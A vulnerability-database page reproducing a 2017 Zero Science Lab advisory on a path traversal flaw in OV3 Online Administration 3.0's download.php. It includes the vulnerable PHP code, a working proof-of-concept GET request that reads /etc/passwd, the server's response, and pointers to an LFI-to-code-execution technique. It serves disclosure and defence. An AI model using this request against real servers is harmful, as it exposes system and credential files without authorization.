Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access

🗓️ 31 May 2017 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 52 Views

OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access vulnerability in "download.php" allows unauthenticated file disclosure

Code
`  
OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access PoC Exploit  
  
  
Vendor: novaCapta Software & Consulting GmbH  
Product web page: http://www.meacon.de  
Affected version: 3.0  
  
Summary: With the decision to use the OV3 as a platform for your data management,  
the course is set for scalable, flexible and high-performance applications. Whether  
you use the OV3 for your internal data management or use it for commercial business  
applications such as shops, portals, etc. Thanks to the data-based structure of the  
OV3, you always have the best tool at your fingertips. The OV3 is a 100% web-based  
tool. This eliminates the need to install a new software on all participating client  
computers. All elements are operated by a standard browser. Further advantages are  
the location-dependent use and - particularly with ASP solutions - the reduced costs  
for local hardware like own servers and modern client workstations.  
  
Desc: The application (Online Verwaltung III) suffers from an unauthenticated file  
disclosure vulnerability when input passed thru the 'file' parameter to 'download.php'  
script is not properly verified before being used to include files. This can be exploited  
to read arbitrary files from local resources with directory traversal attacks.  
  
================================================================================  
/download.php:  
--------------  
  
67: header("Expires: Mon, 1 Apr 1990 00:00:00 GMT");  
68: header("Last-Modified: " . gmdate("D,d M YH:i:s") . " GMT");  
69: /*  
70: header("Cache-Control: no-cache, must-revalidate");  
71: header("Pragma: no-cache");  
72: */  
73: header("Pragma: ");   
74: header("Cache-Control: ");  
75: header("Content-type: application/octet-stream");  
76: header("Content-Type: application/force-download");  
77: $dname = rawurlencode($name);  
78: header("Content-Disposition: attachment; filename=\"$dname\";");  
79:  
80: if ($export==1) {  
81: if (is_file($path.'/'.$file)) {  
82: header('Content-Length: '.filesize($path.'/'.$file));  
83: readfile($path.'/'.$file);  
84: } elseif (is_file(utf8_decode($path.'/'.$file))) {  
85: header('Content-Length: '.filesize(utf8_decode($path.'/'.$file)));  
86: readfile(utf8_decode($path.'/'.$file));  
87: }  
88: }  
  
================================================================================  
  
Tested on: CentOS release 6.8 (Final)  
PHP/5.3.3  
Apache/2.2.15  
MySQL/5.0.11  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5410  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5410.php  
  
  
26.12.2016  
  
---  
  
  
GET /download.php?c_id=557&file=../../../../../../../../../../../etc/passwd&name=download.txt HTTP/1.1  
Host: 127.0.0.1  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: ZSL/3.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch  
Accept-Language: en-US,en;q=0.8  
DNT: 1  
Connection: close  
  
--  
  
HTTP/1.1 200 OK  
Date: Tue, 27 Dec 2016 12:24:10 GMT  
Server: Apache/2.2.15 (CentOS)  
X-Powered-By: PHP/5.3.3  
Expires: Mon, 1 Apr 1990 00:00:00 GMT  
Last-Modified: Tue,27 Dec 201612:24:10 GMT  
Pragma:   
Cache-Control:   
Content-Disposition: attachment; filename="download.txt";  
Content-Length: 0  
Connection: close  
Content-Type: application/force-download  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
...  
...  
  
  
  
The application ships with a phpinfo() file "m_info.php" by default in the web root directory:  
  
http://127.0.0.1/m_info.php  
  
Possibly exploitable for code execution using the PHP LFI to RCE method by Gynvael Coldwind,  
extended by Brett Moore:  
  
- http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf  
- https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 May 2017 00:00Current
0.5Low risk
Vulners AI Score0.5
ov3online verwaltung iiifile access
52